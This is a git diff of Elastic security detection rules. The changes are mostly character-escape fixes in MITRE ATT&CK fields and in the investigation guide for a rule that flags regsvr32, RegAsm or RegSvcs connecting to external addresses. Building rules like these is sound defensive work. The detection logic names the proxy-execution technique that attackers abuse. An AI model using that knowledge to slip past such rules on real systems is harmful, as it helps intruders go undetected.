\"wpdshserviceobj.dll\", \"wpdsp.dll\", \"wpd_ci.dll\", \"wpnapps.dll\", \"wpnclient.dll\", \"wpncore.dll\", \"wpninprc.dll\", \"wpnprv.dll\", \"wpnservice.dll\", \"wpnsruprov.dll\", \"wpnuserservice.dll\", \"wpportinglibrary.dll\", \"wpprecorderum.dll\", \"wptaskscheduler.dll\", \"wpx.dll\", \"ws2help.dll\", \"ws2_32.dll\", \"wscapi.dll\", \"wscinterop.dll\", \"wscisvif.dll\", \"wsclient.dll\", \"wscproxystub.dll\", \"wscsvc.dll\", \"wsdapi.dll\", \"wsdchngr.dll\", \"wsdprintproxy.dll\", \"wsdproviderutil.dll\", \"wsdscanproxy.dll\", \"wsecedit.dll\", \"wsepno.dll\", \"wshbth.dll\", \"wshcon.dll\", \"wshelper.dll\", \"wshext.dll\", \"wshhyperv.dll\", \"wship6.dll\", \"wshqos.dll\", \"wshrm.dll\", \"wshtcpip.dll\", \"wshunix.dll\", \"wslapi.dll\", \"wsmagent.dll\", \"wsmauto.dll\", \"wsmplpxy.dll\", \"wsmres.dll\", \"wsmsvc.dll\", \"wsmwmipl.dll\", \"wsnmp32.dll\", \"wsock32.dll\", \"wsplib.dll\", \"wsp_fs.dll\", \"wsp_health.dll\", \"wsp_sr.dll\", \"wtsapi32.dll\", \"wuapi.dll\", \"wuaueng.dll\", \"wuceffects.dll\", \"wudfcoinstaller.dll\", \"wudfplatform.dll\", \"wudfsmcclassext.dll\", \"wudfx.dll\", \"wudfx02000.dll\", \"wudriver.dll\", \"wups.dll\", \"wups2.dll\", \"wuuhext.dll\", \"wuuhosdeployment.dll\", \"wvc.dll\", \"wwaapi.dll\", \"wwaext.dll\", \"wwanapi.dll\", \"wwancfg.dll\", \"wwanhc.dll\", \"wwanprotdim.dll\", \"wwanradiomanager.dll\", \"wwansvc.dll\", \"wwapi.dll\", \"xamltilerender.dll\", \"xaudio2_8.dll\", \"xaudio2_9.dll\", \"xblauthmanager.dll\", \"xblgamesave.dll\", \"xblgamesaveext.dll\", \"xblgamesaveproxy.dll\", \"xboxgipsvc.dll\", \"xboxgipsynthetic.dll\", \"xboxnetapisvc.dll\", \"xinput1_4.dll\", \"xinput9_1_0.dll\", \"xinputuap.dll\", \"xmlfilter.dll\", \"xmllite.dll\", \"xmlprovi.dll\", \"xolehlp.dll\", \"xpsgdiconverter.dll\", \"xpsprint.dll\", \"xpspushlayer.dll\", \"xpsrasterservice.dll\", \"xpsservices.dll\", \"xwizards.dll\", \"xwreg.dll\", \"xwtpdui.dll\", \"xwtpw32.dll\", \"zipcontainer.dll\", \"zipfldr.dll\", \"bootsvc.dll\", 
\"halextintcpsedma.dll\", \"icsvcvss.dll\", \"ieproxydesktop.dll\", \"lsaadt.dll\", \"nlansp_c.dll\", \"nrtapi.dll\", \"opencl.dll\", \"pfclient.dll\", \"pnpdiag.dll\", \"prxyqry.dll\", \"rdpnanotransport.dll\", \"servicingcommon.dll\", \"sortwindows63.dll\", \"sstpcfg.dll\", \"tdhres.dll\", \"umpodev.dll\", \"utcapi.dll\", \"windlp.dll\", \"wow64base.dll\", \"wow64con.dll\", \"blbuires.dll\", \"bpainst.dll\", \"cbclient.dll\", \"certadm.dll\", \"certocm.dll\", \"certpick.dll\", \"csdeployres.dll\", \"dsdeployres.dll\", \"eapa3hst.dll\", \"eapacfg.dll\", \"eapahost.dll\", \"elsext.dll\", \"encdump.dll\", \"escmigplugin.dll\", \"fsclient.dll\", \"fsdeployres.dll\", \"fssminst.dll\", \"fssmres.dll\", \"fssprov.dll\", \"ipamapi.dll\", \"kpssvc.dll\", \"lbfoadminlib.dll\", \"mintdh.dll\", \"mmci.dll\", \"mmcico.dll\", \"mprsnap.dll\", \"mstsmhst.dll\", \"mstsmmc.dll\", \"muxinst.dll\", \"personax.dll\", \"rassfm.dll\", \"rasuser.dll\", \"rdmsinst.dll\", \"rdmsres.dll\", \"rtrfiltr.dll\", \"sacsvr.dll\", \"scrdenrl.dll\", \"sdclient.dll\", \"sharedstartmodel.dll\", \"smsrouter.dll\", \"spwizimg_svr.dll\", \"sqlcecompact40.dll\", \"sqlceoledb40.dll\", \"sqlceqp40.dll\", \"sqlcese40.dll\", \"srvmgrinst.dll\", \"svrmgrnc.dll\", \"tapisnap.dll\", \"tlsbrand.dll\", \"tsec.dll\", \"tsprop.dll\", \"tspubiconhelper.dll\", \"tssdjet.dll\", \"tsuserex.dll\", \"ualapi.dll\", \"ualsvc.dll\", \"umcres.dll\", \"updatehandlers.dll\", \"usocore.dll\", \"vssui.dll\", \"wsbappres.dll\", \"wsbonline.dll\", \"wsmselpl.dll\", \"wsmselrr.dll\", \"xpsfilt.dll\", \"xpsshhdr.dll\"\n ) and\n not (\n (\n dll.name : \"icuuc.dll\" and dll.code_signature.subject_name in (\n \"Valve\", \"Valve Corp.\", \"Avanquest Software (7270356 Canada Inc)\", \"Adobe Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : (\"timeSync.dll\", \"appInfo.dll\") and dll.code_signature.subject_name in (\n \"VMware Inc.\", \"VMware, Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n 
dll.name : \"libcrypto.dll\" and dll.code_signature.subject_name in (\n \"NoMachine S.a.r.l.\", \"Bitdefender SRL\", \"Oculus VR, LLC\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"ucrtbase.dll\" and dll.code_signature.subject_name in (\n \"Proofpoint, Inc.\", \"Rapid7 LLC\", \"Eclipse.org Foundation, Inc.\", \"Amazon.com Services LLC\", \"Windows Phone\"\n ) and dll.code_signature.trusted == true\n ) or\n (dll.name : \"ICMP.dll\" and dll.code_signature.subject_name == \"Paessler AG\" and dll.code_signature.trusted == true) or\n (dll.name : \"kerberos.dll\" and dll.code_signature.subject_name == \"Bitdefender SRL\" and dll.code_signature.trusted == true) or\n (dll.name : \"dbghelp.dll\" and dll.code_signature.trusted == true) or\n (dll.name : \"DirectML.dll\" and dll.code_signature.subject_name == \"Adobe Inc.\" and dll.code_signature.trusted == true) or\n (\n dll.path : (\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\dxgi.dll\",\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\wincorlib.dll\",\n \"?:\\\\Windows\\\\dxgi.dll\"\n )\n )\n )\n", "related_integrations": [ { "package": "endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_102.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_102.json index 30d54cd7764..4d39f89357f 100644 --- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_102.json +++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_102.json 
@@ -94,7 +94,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -103,7 +103,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_103.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_103.json
index b2c31960759..f89877a5d60 100644
--- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_103.json
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Registration Utility", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -105,7 +105,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_104.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_104.json
index 76981462f8d..c45f167b71e 100644
--- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_104.json
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Registration Utility", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -104,7 +104,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_105.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_105.json
index 3b697c33c7f..a0b7400bd7f 100644
--- a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_105.json
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Registration Utility", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, 